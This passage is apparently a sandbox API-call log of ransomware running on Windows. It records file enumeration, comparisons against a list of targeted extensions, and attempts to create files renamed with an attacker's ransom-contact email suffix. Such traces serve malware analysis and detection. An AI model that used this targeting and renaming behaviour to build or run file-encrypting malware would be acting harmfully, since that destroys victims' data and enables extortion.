returned 4 [0158.113] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0158.113] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0158.113] lstrlenW (lpString=".zip") returned 4 [0158.113] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0158.113] lstrlenW (lpString=".rar") returned 4 [0158.114] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0158.114] lstrlenW (lpString=".bz2") returned 4 [0158.114] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0158.114] lstrlenW (lpString=".7z") returned 3 [0158.114] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0158.114] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0158.114] lstrlenW (lpString=".dbf") returned 4 [0158.114] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0158.114] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0158.114] lstrlenW (lpString=".1cd") returned 4 [0158.114] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0158.114] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0158.114] lstrlenW (lpString=".jpg") returned 4 [0158.114] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0158.114] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0158.114] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0158.114] lstrlenW (lpString=".doc") returned 4 [0158.114] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0158.114] lstrlenW (lpString=".docx") returned 5 [0158.114] lstrcmpiW (lpString1=".docx", lpString2="b.xml") returned -1 [0158.114] lstrlenW (lpString=".pdf") returned 4 [0158.114] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0158.115] lstrlenW (lpString=".xls") returned 4 [0158.115] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0158.115] lstrlenW (lpString=".xlsx") returned 5 [0158.115] lstrcmpiW (lpString1=".xlsx", lpString2="b.xml") returned -1 [0158.115] lstrlenW (lpString=".ppt") returned 4 [0158.115] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0158.115] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0158.115] lstrlenW (lpString=".zip") returned 4 [0158.115] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0158.115] lstrlenW (lpString=".rar") returned 4 [0158.115] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0158.115] lstrlenW (lpString=".bz2") returned 4 [0158.115] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0158.115] lstrlenW (lpString=".7z") returned 3 [0158.115] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0158.115] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0158.115] lstrlenW (lpString=".dbf") returned 4 [0158.115] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0158.115] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0158.115] lstrlenW (lpString=".1cd") returned 4 [0158.115] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0158.115] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 82 [0158.115] lstrlenW (lpString=".jpg") returned 4 [0158.115] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0158.116] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0158.116] lstrlenW (lpString="base_jpn.xml") returned 12 [0158.116] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.117] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x363ff14 | out: lpFileSize=0x363ff14*=804) returned 1 [0158.117] CloseHandle (hObject=0x414) returned 1 [0158.117] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml")) returned 0x20 [0158.117] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.117] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0158.117] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0158.117] lstrlenW (lpString=".doc") returned 4 [0158.117] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0158.117] lstrlenW (lpString=".docx") returned 5 [0158.117] lstrcmpiW (lpString1=".docx", lpString2="n.xml") returned -1 [0158.117] lstrlenW (lpString=".pdf") returned 4 [0158.117] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0158.118] lstrlenW (lpString=".xls") returned 4 [0158.118] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0158.118] lstrlenW (lpString=".xlsx") returned 5 [0158.118] lstrcmpiW (lpString1=".xlsx", lpString2="n.xml") returned -1 [0158.118] lstrlenW (lpString=".ppt") returned 4 [0158.118] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0158.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0158.118] lstrlenW (lpString=".zip") returned 4 [0158.118] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0158.118] lstrlenW (lpString=".rar") returned 4 [0158.118] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0158.118] lstrlenW (lpString=".bz2") returned 4 [0158.118] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0158.118] lstrlenW (lpString=".7z") returned 3 [0158.118] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0158.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0158.118] lstrlenW (lpString=".dbf") returned 4 [0158.118] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0158.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0158.118] lstrlenW (lpString=".1cd") returned 4 [0158.118] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0158.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0158.118] lstrlenW (lpString=".jpg") returned 4 [0158.118] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0158.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0158.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0158.119] lstrlenW (lpString=".doc") returned 4 [0158.119] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0158.119] lstrlenW (lpString=".docx") returned 5 [0158.119] lstrcmpiW (lpString1=".docx", lpString2="n.xml") returned -1 [0158.119] lstrlenW (lpString=".pdf") returned 4 [0158.119] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0158.119] lstrlenW (lpString=".xls") returned 4 [0158.119] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0158.119] lstrlenW (lpString=".xlsx") returned 5 [0158.119] lstrcmpiW (lpString1=".xlsx", lpString2="n.xml") returned -1 [0158.119] lstrlenW (lpString=".ppt") returned 4 [0158.119] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0158.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0158.119] lstrlenW (lpString=".zip") returned 4 [0158.119] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0158.119] lstrlenW (lpString=".rar") returned 4 [0158.119] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0158.119] lstrlenW (lpString=".bz2") returned 4 [0158.119] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0158.119] lstrlenW (lpString=".7z") returned 3 [0158.119] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0158.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0158.119] lstrlenW (lpString=".dbf") returned 4 [0158.119] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0158.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0158.119] lstrlenW (lpString=".1cd") returned 4 [0158.119] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0158.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 82 [0158.120] lstrlenW (lpString=".jpg") returned 4 [0158.120] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0158.120] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0158.120] lstrlenW (lpString="base_kor.xml") returned 12 [0158.120] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0158.120] GetFileSizeEx (in: hFile=0x414, lpFileSize=0x363ff14 | out: lpFileSize=0x363ff14*=488) returned 1 [0158.121] CloseHandle (hObject=0x414) returned 1 [0158.121] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml")) returned 0x20 [0158.121] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0158.121] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0158.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 82 [0158.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 82 [0158.121] lstrlenW (lpString=".doc") returned 4 [0158.121] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0158.121] lstrlenW (lpString=".docx") returned 5 [0158.121] lstrcmpiW (lpString1=".docx", lpString2="r.xml") returned -1 [0158.121] lstrlenW (lpString=".pdf") returned 4 [0158.121] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0158.121] lstrlenW (lpString=".xls") returned 4 [0158.121] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0158.121] lstrlenW (lpString=".xlsx") returned 5 [0158.121] lstrcmpiW (lpString1=".xlsx", lpString2="r.xml") returned -1 [0158.121] lstrlenW (lpString=".ppt") returned 4 [0158.121] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0158.122] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 82 [0158.122] lstrlenW (lpString=".zip") returned 4 [0158.122] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0158.122] lstrlenW (lpString=".rar") returned 4 [0158.122] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0158.122] lstrlenW (lpString=".bz2") returned 4 [0158.122] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0158.122] lstrlenW (lpString=".7z") returned 3 [0158.122] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0158.122] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 82 [0161.753] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0161.754] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0161.754] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107146.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.541] CloseHandle (hObject=0x510) returned 1 [0162.544] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.544] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107500.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107500.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.544] CloseHandle (hObject=0x510) returned 1 [0162.545] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.545] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.545] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107502.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107502.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.545] CloseHandle (hObject=0x510) returned 1 [0162.549] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.549] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.549] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107512.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107512.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.549] CloseHandle (hObject=0x510) returned 1 [0162.552] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.552] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.552] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107514.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107514.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.552] CloseHandle (hObject=0x51c) returned 1 [0162.553] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.554] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.554] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107516.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107516.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.554] CloseHandle (hObject=0x51c) returned 1 [0162.555] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.555] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.556] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107526.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107526.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.556] CloseHandle (hObject=0x51c) returned 1 [0162.557] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.557] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0162.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107528.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107528.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0162.557] CloseHandle (hObject=0x51c) returned 1 [0163.006] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.007] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.007] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107544.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107544.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.523] CloseHandle (hObject=0x510) returned 1 [0164.025] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.026] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.026] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185796.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185796.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.026] CloseHandle (hObject=0x52c) returned 1 [0164.027] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.027] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.027] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185818.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185818.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.027] CloseHandle (hObject=0x52c) returned 1 [0164.028] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.028] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.028] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185828.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185828.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.028] CloseHandle (hObject=0x52c) returned 1 [0164.029] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.030] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.030] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185834.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185834.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.030] CloseHandle (hObject=0x52c) returned 1 [0164.031] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.031] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.031] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185842.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185842.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.031] CloseHandle (hObject=0x52c) returned 1 [0164.032] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.032] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.032] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186346.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186346.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.032] CloseHandle (hObject=0x52c) returned 1 [0164.034] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.034] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.034] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186360.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186360.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.034] CloseHandle (hObject=0x52c) returned 1 [0164.035] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.035] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.036] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 